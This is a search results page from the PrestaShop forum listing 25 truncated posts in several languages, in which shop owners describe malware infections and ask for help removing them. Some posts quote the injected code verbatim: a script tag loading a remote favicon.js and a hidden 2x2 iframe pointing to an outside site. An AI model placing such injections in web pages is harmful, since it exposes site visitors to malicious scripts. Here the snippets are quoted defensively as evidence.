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Found 25 results

  1. Aviso a la comunidad o a quien pase por lo mismo! Recientemente mi web ha sufrido de infección de malware, quizás haya sido por algún plugin de tercero instalado que se me haya pasado por alto. Cuya función afectaba a los clientes que visitaban la web; siendo así, una vez ingresan y cargan la página...
  2. Hello In the code source of the order pages of my Prestashop 1.6 website, I found a script tag who is calling a malicious script <script type="text/javascript" src="https://www.avir.ir/image/favicon.js"></script> <!DOCTYPE HTML> <!--[if lt IE 7]><html class="no-js lt-ie9 lt-ie8 lt-ie7" la...
  3. Buy it here: https://addons.prestashop.com/en/website-security-access/44413-security-pro.html Price: Only 69,99 EURO (Free support included) Cheap doesn't always mean bad. I spent more than a year on this project and I want to help as many store owners as pos...
  4. What's TOR and IP Blocker? Our module is a complete security suite for PrestaShop 1.5.X - 1.7.X including active blocking rules for TOR network, IP's, CIDR ranges, proxies, bots, hosts, bad user agents, SQLi, XSS and more. Secure your business with the definitive all-in-one firewall solution fo...
  5. I downloaded PrestaShop first time yestarday (https://www.prestashop.com/es) and my computer has been infected with this trojan: Trojan:Win32/Emali.A!cl. Now I have mistrust and I need to resolve some questions: 1) Is it possible that yesterday the official Prestashop page suffered a ph...
  6. Bonjour Dans le code de mes pages de commande, avant toute la structure classique de la page , se trouve une balise script qui appelle un script malveillant. <script type="text/javascript" src="https://www.avir.ir/image/favicon.js"></script> <!DOCTYPE HTML> <!--[if lt IE 7]><html class="n...
  7. I got hit last year by this bot so i reverted to a back up and removed the phpunit directories. Now the damn thing it back again but this time causing us to have all my sites shut down on my hosting. Can anyone point me to a good guide so i can check where to look for all the parts of the malware?...
  8. Cześć, szukam kogoś, kto pomoże mi w usunięciu malware ze sklepu na Presta. Oczywiście odpłatnie. Na PW mogę podać adres sklepu i uzgodnić wszelkie szczegóły. Pozdrawiam Rozmiar
  9. Καλή χρονιά, διαβάστε τον ακόλουθο σύνδεσμο που αφορά διαδικασίες ασφάλισης του eshop απέναντι στο malware XsamXadoo Bot Security Announcement
  10. Buenas, tengo un problema al entrar en backoffice, intuyo por no haber actualizado mi versión de prestashop. Me aparece lo siguiente, alguien me podría ayudar? [PrestaShopException] No access reference in table module_access for id_module 108. at line 2538 in file classes/module/Modu...
  11. Cordial saludo Tengo instalado prestashop Tengo un virus que se replica constantemente en mi tienda. Constantemente presenta: 1. Cambia varios index.php de mi tienda y le realiza un @incliude. ejemplo: img/p/8/.afb8e7ac.ico //Si pueden ver es un archivo con punto i...
  12. dal mio sito di ecommerce hanno cominciato a partire mail ad indirizzi russi. Ho sospeso le funzioni di email e cambiato tutte le password ma dopo mezza giornata sono ricominciate. Uso Prestashop ed aveva sempre funzionato tutto regolare da diversi anni. Qualcuno sa dirmi come poter risolver...
  13. i have prestashop site. that site hacked by someone. it was only .htaccess file change. when we log into mobile device it redirect to other site. the .htaccess file generate every directory. when i change the code it will fix. but again and again the hacker change the .htaccess file. how to fix it.
  14. Several messages that Prestashop sends to customers are rejected by the recipient host. I get messages like "spamhaus", "501 Syntactically invalid HELO argument" etc. (you can see them in the links below) I downloaded the website files and scanned them with Norton Powere Eraser but no threats were...
  15. I was just doing a backup of my site to my office computer. I am using version 1.6, running the default theme and no custom add-ons. While downloading the Prestashop folder I was alerted by Kaspersky Antivirus that I had downloaded 3 Trojan Downloaders.JS.Agent.hbs from the presta\cache\smarty\com...
  16. I think my prestashop has been messed up by malware or a virus. There is random text at the top of the page,I get an error in my modules page and When loading my site it loads all sorts of weird sites before. You can find it at azcoweb.com/web1/prestashop Any help is appreciated
  17. Hi, My website has a malware. Its the html/Iframe.B.Gen. I contacted my hosting, and he told me the files that have been injected. He told me this: "Your site was unfortunately exploited and a malicious iframe was injected into several files:" This has never happend to me before. What sh...
  18. Buenas que tal? Durante dos dias he tenido una visita de un bot desde San Jose con mas de 300 visitas al día. Al darme cuenta he baneado su ip. Me gustaria saber si existe algun modulo, aplicacion o web para chequear la pagina y ver si tiene algun malware o troyano...etc... Gracias people d...
  19. after 3 days being online, I got infected with malwear! Bing notified me I am now infected.... yet google did not show anything I ran a number of free scanners and after 2 hours I found one site that said "Blackhole Exploit Kit I still have no idea even what folder or file to look...
  20. my website www.brixton-beds.co.uk got a malware virus and cannot access to my website, please help me to remove the virus without losing any data. please have a look on the link above. and help me, thanks
  21. Esto es un robot automatizado que inyecta publicidad no autorizada. (Sale un pop up ,Abajo en el food y en el lateral derecho) ¿Cómo se detecta? El caso se me da en la inyección en la descripción larga del producto al final de ella. Y lo encontré en un producto con el firebug y lo elimine es...
  22. Hi, i have a malware in my site. In the home page, after the <body> I have this code: <iframe src="http://online1you.com/1/search.php?sid=1" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe> How I can remove it? Thanks so mush!
  23. ok I know that sounds weird but even though google tells me my site is clean and free of malware (I removed them myself a few daysa ago) Firefox says that "this is a dangerous site, malware" etc. It shows me the well known red screen warning. I thought maybe it is my cookies but its not because...
  24. Hello, I have an urgent security request. Our shop contains malicious code that is only present in cached files. At the end of those cached files there's some encrypted javacript code added which adds a reference to an IP adress - at least that's why understand. It's explained here: http://w...
  25. While pulling my hair out trying to upgrade a site from 1.4.1 to I decided to delete the contents of my public_html folder and replace with a backup I took before starting. I was not amused to discover that the facebooklike and twitter modules could not be deleted, either via ftp or File Man...
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